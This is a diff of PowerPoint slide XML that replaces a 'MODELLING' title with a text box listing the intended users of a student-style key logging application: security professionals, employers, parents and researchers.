           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
@@ -8380,111 +10058,503 @@
               </a:spcBef>
             </a:pPr>
             <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
-              <a:rPr sz="1100" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D936B"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
+              <a:rPr spc="10" dirty="0"/>
               <a:t>9</a:t>
             </a:fld>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
+            <a:endParaRPr spc="10" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="8" name="object 8"/>
+          <p:cNvPr id="9" name="TextBox 8">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26521B18-3662-1542-AAA2-9CDD6ACA85B0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="739775" y="291147"/>
-            <a:ext cx="3303904" cy="758190"/>
+            <a:off x="685800" y="1600200"/>
+            <a:ext cx="8534400" cy="4495800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
+          <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
+          <a:bodyPr wrap="square" rtlCol="0">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="12700">
+            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="105"/>
+                <a:spcPct val="0"/>
               </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="4800" b="1" spc="15" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>M</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4800" b="1" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>O</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4800" b="1" spc="-15" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>D</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4800" b="1" spc="-35" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>E</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4800" b="1" spc="-30" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>LL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4800" b="1" spc="-5" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>I</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4800" b="1" spc="30" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>N</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4800" b="1" spc="5" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>G</a:t>
-            </a:r>
-            <a:endParaRPr sz="4800">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Identifying the target audience for our key logging application helps in understanding its utility and designing its features accordingly.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+              <a:ln>
+                <a:noFill/>
+              </a:ln>
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
             </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Primary Users</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="q"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Security Professionals</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Monitor and detect unauthorized access attempts.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="q"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Employers</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Track employee productivity and ensure resources are used appropriately.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="q"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Parents</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Monitor their children’s online activities to ensure they are safe.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Secondary Users</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="q"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Researchers</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Conduct studies on user behavior and typing patterns.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
